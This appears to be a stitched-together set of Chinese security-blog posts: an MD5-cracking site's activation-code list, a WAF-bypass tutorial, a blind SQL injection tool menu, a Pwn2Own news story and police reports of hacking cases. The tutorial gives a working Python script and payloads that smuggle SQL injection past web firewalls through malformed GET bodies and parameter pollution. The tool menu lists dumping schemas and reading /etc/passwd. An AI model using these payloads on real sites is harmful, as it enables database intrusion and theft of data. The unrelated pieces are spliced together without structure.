所以没必要注册多个帐号.

注册暂时开放了,访问 会员注册 页面会自动生成一个激活码.

该激活码内有一定数量的所谓”金币”.

该激活码可以用于新帐号注册,不能用于已有帐号充值.

如何获得可用于充值的激活码:

可通过以下方式的任何一种获取可用于充值的激活码(50-5000不等)

1. 在您的博客\空间等做上 md5 破解板块的 友情链接 ,并且截图发送到管理员邮箱

2.提交建议被采纳

3.提交bug被采纳

4.别的方法我没想好的

5.提交成功率髙的字典

6.也可以赞助本站获得激活码

以上方式请通过如下邮箱联系管理员 : root@0x50sec.org

为什么改成这样的?

节约资源,或者其他just for fun~~~

新增了md5(md5($pass))、md5(md5($pass).$salt) (discuz)等加密方式的破解。

小站资源有限决定对占用资源的部分进行会员制度。

会员注册需要使用邀请码。

先发放20个.

-::激活码                                                        -::金额

2ad454b95d23576cdf33a9f4337922f4     50

再放20个

-::激活码                                                        -::金额

f4cf60f1f153cd710234cd65586296fb     100
4170f1b65b74a7918808393a8656b586     100
38f29aa54cede433a1fb63a8c6f40155     100
5fac5f3e22162d24c56d24f5d34d4574     100
1fafa5d98086085949f87a4fdaf4e162     100
c215d6af0192225d7e1708f0c9d1be93     100
a355c4f9af46d5b79f09719a90637de2     100
1b8baf24d244328ef829ae142a1b15ae     100
05c18d05fc2d4c2040e451d4b3db4d38     100
af6947164fe453dbdcd681fed91e4150     100
89a4f54e31c81ea8f6246aed150bd4f1     100
1a5f3d314552341461bfb906ff10b520     100
9c49fe1f93b6e9bc4aca5a95d5547f53     100
5a5983e93af81f7d6edadbec35e08d6a     100
309ff64f2f208e1384de0208b83a34de     100
5976218171de77b9a4f2198a0fbe4665     100
86395fc102c3d625001ff88bba85647b     100
a2e08390a33f10e0c6f95d7c4ff9eef7     100
cf4d7b1d13da30e2fdeff40755aaaad5     100
ed6bf6d3c103ea4022730be2a4abc09c     100

0×00 前言

08年初诞生了一种SQL群注攻击，黑客在全球范围内对asp，asp.net加MSSQL架构的网站进行了疯狂扫荡。由于MSSQL支持多语句注入，黑客通过一条结合游标的SQL语句就能将整个数据库的字段内容自动进行篡改，可以在网站上无差别的进行网页木马攻击。

互联网是快速更新迭代的，但是很多没有开发能力的单位都是通过外包建立网站，网站的程序一上线就再也无人维护，很多程序存在各种漏洞无法修补，于是 WAF便有了市场，现今门槛低且最能解决问题的是针对IIS/apache的软件WAF，通常一个模块一个扩展就能搞定，当然也有耗资百万千万的硬件 WAF，然而如果WAF拦截规则出现漏洞，这百万千万的硬件也就是一堆废铁。那么WAF是否真的可以解决所有的WEB安全问题呢？所以本文主要解析一些可以绕过WAF的罕见漏洞，供安全人员参考。

0×01 Request对象的包解析漏洞.

asp和asp.net的Request对象存在一个包解析漏洞，Request对象对于GET和POST包的解析过于宽松，用一句话表达就是 Request对象它GET和POST傻傻分不清楚，稍有点web开发经验的同学应该知道Request接收GET,POST,COOKIE也就是GPC 传过来的数据，但是asp和.net库内置的Request对象完全不按RFC标准来，下面我们可以做个测试：

分别将下面两段代码保存为1.asp和1.aspx

使用asp的Request对象接收t参数传值
———————————————–
＜%
Response.Write “Request:” & Request(“t”)
%＞
———————————————–

使用asp.net的Request对象接收t参数传值
———————————————–
＜%@ Page Language=”C#” %＞
＜%
string test = Request["t"];
Response.Write(“Request:”+test);
%＞
———————————————–

使用下面的python脚本调用socket发送原始的HTTP包
———————————————–
#!/usr/bin/env python

import socket

host = ’192.168.239.129′
path = ‘/1.asp’
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

exploit_packet=”t=’/**/or/**/1=1–”
exploit_packet+=”\r\n” * 8
packet_length = len(exploit_packet)
packet=’GET ‘ + path + ‘ HTTP/1.1\r\n’
packet+=’Host: ‘ + host + ‘\r\n’
packet+=’Content-Length: %s\r\n’ % packet_length
packet+=’Content-Type: application/x-www-form-urlencoded\r\n’
packet+=’\r\n’
packet = packet + exploit_packet

print packet
s.send(packet)
buf = s.recv(1000)
if buf: print buf[buf.rfind("\r\n"):]
s.close()
———————————————–

我们发送的原始包是：
GET /1.asp HTTP/1.1
Host: 192.168.239.129
Content-Length: 34
Content-Type: application/x-www-form-urlencoded

t=’/**/or/**/1=1–

结果返回如下：
Request:’/**/or/**/1=1–
将python测试脚本的path改为/1.aspx测试页返回同样结果。

我们可以看到这是一个畸形的HTTP GET请求包，这个包的奥秘在于t=’/**/or/**/1=1–参数后的8个回车换行和Content-Length头，包的结构类似于一个POST 包，而请求的方法是GET,最后asp和asp.net的Request对象成功的解析了这个畸形包取出了数据。

所以如果WAF没有处理好HTTP包的内容，沿用常规思路处理GET和POST的逻辑的话，那么这个畸形包将会毁掉WAF的基础防御。

0×02 被遗忘的复参攻击.

大家应该还记得09年的HTTP Parameter Pollution攻击，查看[3]文档，可以发现ASP/IIS和ASP.NET/IIS的场景下存在一个复参特性，本文将利用这种的特性的攻击简称为复参攻击，用0X01里的例子简单的测试一下:

用GET请求传入两个t参数
GET http://192.168.239.129/1.asp?t=1&t=2
将返回
Request:1, 2

asp和asp.net的Request对象接收了两个参数，并且以逗号分隔，所以便衍生出了[3]文档中的复参SQL注入方法：

Vulnerable code：
SQL=”select key from table where id=”+Request.QueryString(“id”)

This request is successfully performed using the HPP technique：
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users

The SQL request becomes：
select key from table where id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/usersLavakumarKuppan,

我们可以看到通过巧妙的运用注释符结合复参特性可以分割GET参数中的SQL注入语句，如果WAF对GET参数的处理过于简单是不是会匹配不到拦截规则呢?

0×03 高级复参攻击.

ASP.NET的Request对象有一个Params属性，ASP.NET程序员在一些程序中会使用Request.Params["xxx"] 传入数据，参考[4]微软MSDN文档我们可以知道Params属性的特性，该属性接收GET,POST和Cookie的传值集合，这里我们可以修改 0×01里的例子测试一下：

使用asp.net的Request.Params方法接收t参数传值
———————————————–
＜%@ Page Language=”C#” %＞
＜%
string test = Request.Params["t"];
Response.Write(“Request:”+test);
%＞
———————————————–

发送一个POST包，GET,POST,COOKIE三个方法中都带有不同的t参数内容
———————————————–
POST http://192.168.239.129/1.aspx?t=1 HTTP/1.1
Host: 192.168.239.129
Cookie: t=2

t=3
———————————————–

结果返回
Request:1,3,2

最后得出结论，Request.Params方法接收的数据是按照GPC顺序整合，看到这里的同学再联想到0×02的复参攻击应该如醍醐灌顶了，我们可以将SQL攻击语句拆分到GET,POST,COOKIE三个变量里进行组合攻击。想一想WAF针对这种高级复参攻击是否防御好了？

0×04 后话

WAF是不可能解决所有安全问题的，本文的思路归其本源实际上是描叙了WAF处理HTTP包与服务端处理HTTP包数种差异。互联网是不断更新迭代的，差异存在，类似的漏洞也会存在。
本文提到了三种绕过WAF的思路，第一种是我的原创属于0DAY状态，第二种是参考已有的复参攻击，其中第三种高级复参攻击是由Safe3同学提出的，本文也是与Safe3同学讨论他开发的WAF的BUG而来，所以感谢Safe3同学。
另外请大家不要将本文的内容用于非法途径，仅供安全人员参考，谢谢。

参考：
[1].http://www.faqs.org/rfcs/rfc2616.html
[2].http://www.w3school.com.cn/asp/asp_ref_request.asp
[3].http://www.ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf
[4].http://msdn.microsoft.com/en-us/library/system.web.httprequest.aspx

小博客为了那50块钱交域名费，就把自己给卖了。不过话说我还是非常看好这个博客联盟的。

有人来搞好东西当然要欢迎的。1000人都已经到了850多位了，支持的朋友赶紧吧。
拿福能千人挑战赛
千人挑战赛点这里参加。

此外还尝试用C语言写一个web漏洞检测程序。
初步实现是爬行网页，提取url，然后提取url的参数，然后判断是否存在注射。这些东西网上都有，我实现这个玩意主要是检验和提高C语言编程方面的知识，另一方面自己写的可以随意扩展，并且用的时候知道程序在干什么。已经初步实现了检测部分弱智注射了，还存在很多要完善的地方，真正要写个小工具的时候发现并不是那么简单，老有想找个代码参考下的冲动。

[root@localhost]# ./bget.pl

|=—————————————–=|
|=——[ Blind SQL Injector V1.3 ]——–=|
|=——-[ c4rp3nt3r@0x50sec.org ]———=|
|=—————————————–=|

Choose a number to be execute:
[0] sql (from [STDIN])
[1] version()
[2] database()
[3] user()
[4] dump table_schema v5.x
[5] dump table_name (table_schem=database() v5.x)
[6] dump column_name (table_name= [STDIN] v5.x)
[7] fuzz table_name v4.x
[8] fuzz column_name v4.x
[9] fuzz web path(‘read httpd.conf’)
[a] load_file(‘/etc/passwd’)
[b] load_file(‘c:\boot.ini’)
[c] load_file(‘file path from [STDIN]‘)
[d] load_file(‘file path from [STDIN] error base’)
[e] dump table_schema (v5.x error base)
[f] dump table_name (table_schem=database() v5.x error base)
[g] dump column_name (table_name= [STDIN] v5.x error base)
[x] sql (from [STDIN] error base)

Choose a number#

曾多次参加Pwn2Own大赛并获奖的黑客查理·米勒(Charlie Miller)与其队友迪翁·布拉扎基斯(Dion Blazakis)合作，当天在很短时间内攻破iPhone 4手机。米勒和布拉扎基斯两人都就职于美国安全咨询公司ISE。这也是米勒连续四次在Pwn2Own大赛上获奖。

米勒曾在2008年、2009年以及2010年Pwn2Own大赛上获奖。在此之前，还从未有参赛者在Pwn2Own大赛上连续四次获奖。在去 年举行的Pwn2Own大赛上，米勒对一台苹果MacBook Pro笔记本发起攻击，并攻破该笔记本所预装Snow Leopard操作系统中的Safari浏览器。

米勒周四说：“在往年Pwn2Own大赛开始之前，我们已经找到了相应攻击目标的技术漏洞。但今年的情况却大为不同。在周四比赛开始前一天晚 上，我们仍在寻找iPhone 4的技术漏洞。虽然我们已为此准备了数月时间，但要攻破iPhone 4确实相当困难。”他还表示，在此次攻击iPhone 4过程中，布拉扎基斯功不可没。

Pwn2Own黑客大赛主办方TippingPoint公司规定，参赛者不得对外透露他们所发现产品漏洞的任何技术细节，也不得擅自发布自己所 使用的 攻击代码。按照惯例，TippingPoint将把参赛者所发现的漏洞反馈给相应厂商。在各厂商发布相应漏洞补丁程序之前，大会主办方和参赛者皆不得对外 公布这些漏洞的详细情况。

攻破黑莓

攻破黑莓Torch 9800手机的参赛队为一个国际三人组合，其成员分别为德国的文森佐·艾奥佐(Vincenzo Iozzo)、卢森堡的拉尔夫·韦恩曼(Ralf Weinmann)以及一位来自荷兰的技术开发人员。艾奥佐和韦恩曼曾参加2010年Pwn2Own大赛，并攻破iPhone 3GS手机。

曾为Pwn2Own大奖获得者、今年已担任Pwn2Own大赛评委的皮特·维莱格登希尔(Peter Vreugdenhil)表示，虽然米勒团队和艾奥佐团队在大赛开始前进行了艰苦的准备工作，但比赛正式开始后，这两个团队都仅用了数秒钟时间，就攻破了 各自攻击目标。

米勒团队和艾奥佐团队将分别获得1.5万美元奖金，所攻破的智能手机也将归他们所有。

退出比赛

维莱格登希尔透露，在今年Pwn2Own大赛开始前，部分报名者决定向三星Nexus S手机(运行谷歌Android平台)以及戴尔Venue(运行WP7平台)发起攻击。但周四当天，三星Nexus S及戴尔Venue的攻击者皆没有来到比赛现场。

计划向三星Nexus S发起攻击的技术人员乔恩·奥布赫德(Jon Oberheide)本周早些时候表示，他无法参加今年Pwn2Own大赛的原因是，他此前将自己发现的一个Android技术漏洞告知了谷歌，而谷歌一 周前修复了该漏洞，导致自己没能找到新的可利用漏洞。

另一名参赛者乔治·霍兹(George Hotz)则因正同索尼打官司而无法成行。他原本计划在今年Pwn2Own大赛上对WP7手机发起攻击。此前索尼对霍兹等人提起法律诉讼，原因是认为霍兹 等人公布了如何实现对索尼PlayStation 3游戏机解锁的具体方式。

维莱格登希尔还表示，周四仍未被攻破的产品还包括火狐(Firefox)浏览器。参赛者山姆·达什(Sam Dash)在对火狐进行攻击后无功而返。在周三的Pwn2Own大赛上，苹果Safari 5和微软IE 8两款浏览器相继被攻破。

维莱格登希尔称，虽然离今年Pwn2Own大赛结束还有一天时间，但预计不会再有人站出来对未被攻破的浏览器和智能手机发起攻击。尽管如此，维莱格登希尔认为，今年Pwn2Own大赛取得了成功。

2010年12月10日，海南省公安厅公共信息网络安全监察处接到报案称，海南广播电视台的官方网站蓝网于2010年10月13日凌晨6点至当 日中午12点被攻击，服务器遭受堵塞导致不能正常运行，网页无法打开，后台无法登陆，导致蓝网瘫痪。2011年1月8日，海口市公安局查得该案的犯罪嫌疑 人在贵州省安顺市，在安顺市公安局公共信息网络安全监察支队的配合下，公安机关在安顺市将犯罪嫌疑人柏留康抓获。

据了解，2010年9月初，犯罪嫌疑人柏留康利用漏洞扫描软件在互联网上自动扫描时，发现海南省广播电视总台网站蓝网的服务器存在安全漏洞，破 解了该服务器中的来宾账户的密码，并通过远程连接的方式，将该账户的权限提升为管理员权限，从此获得了该服务器的完全控制权。2010年10月11日，犯 罪嫌疑人柏留康频繁上传黑客软件到蓝网的服务器中，2010年10月12日到13日中午13时近一天的时间里，犯罪嫌疑人柏留康在安顺市频繁远程登录蓝网 服务器，并使用此前上传的黑客工具软件对郑州的一个IP地址持续发放数据包进行DDOS溢出攻击。持续大量发送数据的操作造成在此期间蓝网服务器使用的 50M网络宽带严重堵塞，网站无法正常访问，后台也无法正常登陆，使海南省广播电视总台10月12日晚20：00—22：00举办的“风雨同舟”赈灾晚会 的网上同步直播受到严重干扰。

除上述犯罪事实外，侦查过程中还发现，犯罪嫌疑人柏留康还在网上建了一个叫“发客网”（www.888k.org）的网站，公开招揽收费攻击他 人网站或网吧的非法业务，多次在其他网站发布招揽收费攻击及收费招收黑客徒弟的广告。在柏留康的网络硬盘的一个文本文件中，保存了包括蓝网服务器管理员密 码在内的多个服务器登陆密码。因此，犯罪嫌疑犯柏留康还有实施其它机算机犯罪的重大嫌疑，现正在进一步侦查中。

入侵游戏网站后台修改网站“虚拟银行”数据将产生的虚拟货币转移至朋友的支付宝中再转移给同伙顾伟顾伟将虚拟货币向玩家兜售获利

看黑客之术

他很牛

无声无息盗走“虚拟银行”400万

“快出牌，快出牌”、“糊了”、“不要脸，牌不好就跑”……去年11月，在杭州某棋牌游戏网站上，网友们和往常一样玩得不亦乐乎。但在该网站的后台，网 络管理员的头上却渗出了滴滴冷汗。原来，从去年9月开始，他们就发现网站中存储游戏点数的“虚拟银行”中数据出现了异常。

经常玩网络 游戏的人都知道，玩游戏需要用钱购买游戏点数即网络虚拟货币，杭州这家网站同样如此。在该网站上，网络虚拟货币被称为“银子”。正常情况下，网站的“银 子”储存在“虚拟银行”中，其总量是固定的。让网络管理员异常纳闷的是，“虚拟银行”的“银子”数量每天都固定增加一亿两千万两，相当于人民币一万余元。 而这些“银子”产生后，迅速地被人转卖给其他用户，这一情况使得网站“虚拟银行”的货币不停地贬值。

“肯定是系统被入侵了。”网络管 理员一开始就意识到了这个问题，但是他们运用自己的网络技术查找了两个月，却依然找不到问题所在。“银子”的大量产生，导致该游戏平台的虚拟货币贬值，给 网站造成间接损失人民币400余万元。由于该网站服务器在南京玄武区，网站经营者于去年11月向南京玄武警方报案，请求帮助调查。

他很狂

故意设陷阱让警方钻“死胡同”

玄武警方接警后，分局局长胡士宁、副局长吴晓马立即指示网警大队进行侦查。据网警大队孙永明副大队长介绍，根据报案人提供的信息，网络犯罪侦查民警经过 初步研究后认为，该网站后台肯定有漏洞，且被人发现并加以利用。“只要找到网站后台的漏洞，就能抓住黑客的”狐狸尾巴”。”孙永明说，这是一般的网络入侵 案件的侦破思路。

但是，网警们运用自己的专业知识，经过多天的查找，却和网站管理员一样，找不到头绪。“连黑客利用的网络漏洞都没找 到，更别提黑客的入侵手法了。”孙永明说，他们意识到，着眼于找网站漏洞是徒劳的，只会浪费大量时间并耽误侦查进展，他们马上调整侦查思路，着重于从嫌疑 人踪迹入手。于是，去年11月下旬开始，玄武网络民警运用他们的专业知识，在虚拟的网络世界，和黑客展开了一场没有硝烟的“暗战”。

对于网络来说，没有时间和空间的限制，犯罪嫌疑人可能在任何时间和地点作案。为此，24小时紧盯网络是侦查的必要步骤。“网络侦查虽然不像现场抓捕普通刑 事犯罪分子那样惊心动魄，但也紧张刺激。”孙永明说，侦查中，他和网警贾东海、马尧在网上发现了黑客的入侵踪迹，便开展循线追踪。但是，这名黑客显然不同 于以往的一些“菜鸟”，当网警们满心欢喜地以为即将抵达“目的地”时，却发现其实是走进了“死胡同”。

看警方之道

网上“斗智”同时外围侦查发现顾伟一直在网络上销售大量该网站的虚拟货币着力调查虚拟货币来源锁定侵入受害网站的顶级黑客徐放

锁定目标

黑客在国外院校从事高端研究

“这种情形反复了多次，我们换了好多种破案思路都是这样。”孙永明副大队长说，回过头细细分析侦查的过程，他们总会发现，嫌疑人似乎早就料到他们会采取 的步骤，故意设了“陷阱”让他们钻进去，然后便是无功而返。“这次是遇上顶尖高手了。”民警们决定用尽一切办法都要把他找出来。

在网 警大队的网络高手和这名顶级黑客“过招”的同时，负责外围侦查的民警发现了一条重要线索。在受害网站被侵入的那段时间，有一名杭州男子顾伟一直在网络上销 售大量该网站的虚拟货币。办案民警立即将视线转向他，开始侦查他的虚拟货币来源。经过十多天的艰苦追踪，终于警方锁定，侵入受害网站的顶级黑客名叫徐放， 四川绵阳人，顾伟正是他的销赃人。

民警一查他的身份，着实有点吃惊，而徐放落网后的交代，更让民警惋惜。1979年出生的徐放非常聪 明，从上小学起成绩就非常拔尖。高中时就被国内某顶尖理科院校提前单独招生录取。进大学前，徐放对计算机科学就有浓厚兴趣，并通过自学积累了大量软硬件知 识。但进大学后，他却没能进入自己钟情的计算机科学领域深造，而是进入了热能专业。虽然专业不是自己所向，但他还是取得了优异的成绩。本科毕业后，徐放又 进入国内某科研院所读硕士研究生，研究领域是低温超导。以优异成绩轻松取得学位后，他继续攻读博士。这次，他又换了个专业方向，主攻能源研究，并成为该科 研院所的研究人员。

“徐放学历之高，所从事领域之尖端，是十分罕见的。”孙永明说，2007年，徐放就入侵过某游戏网站，寻找该游戏 网站后台漏洞，修改数据取得大量游戏点数，并通过转卖获利十万元。那一次，他很快被黑龙江大庆警方抓获。因情节较轻且退还了全部非法所得，徐放仅被处以治 安处罚。但是，因为此次事件，他被迫离开了原单位。随后徐放便去了国外，并进入某大学从事研究工作。在作案阶段，他正在国外协助一位教授，指导研究生，收 入不菲。

迅速出击

大年初二嫌疑人落网

去年12月，玄武 警方锁定了徐放之后，发现其身在国外，抓捕有一定困难，便决定另寻他途。经侦查，民警了解到，徐放这些年每年都要回四川老家过年，时值岁末，估计他很可能 马上就要回国。于是，办案民警决定等到过年前后再伺机行动。今年1月26日，侦查人员获悉，徐放乘坐飞机回国，并前往四川绵阳。

办案 民警立即前往绵阳，在当地警方配合下，玄武警方获悉，徐放家的老房子已经拆迁了，现在他们家身居何处周围邻居都不太清楚。民警只得通过其他途径寻找徐放的 踪迹。在寻找过程中，玄武警方获悉，徐放大年初三准备举办结婚典礼，婚后就要和新婚妻子赶赴海南度蜜月。为防止徐放有所警觉后逃跑，玄武警方决定大年初二 实施抓捕行动。大年初二下午，民警在一家银行门口将到银行取钱的徐放抓获。与此同时，玄武警方还派出抓捕组赴杭州，将徐放的同伙顾伟抓获。至此，该起入侵 计算机系统案件两名犯罪嫌疑人全部抓获。 杨维斌 罗双江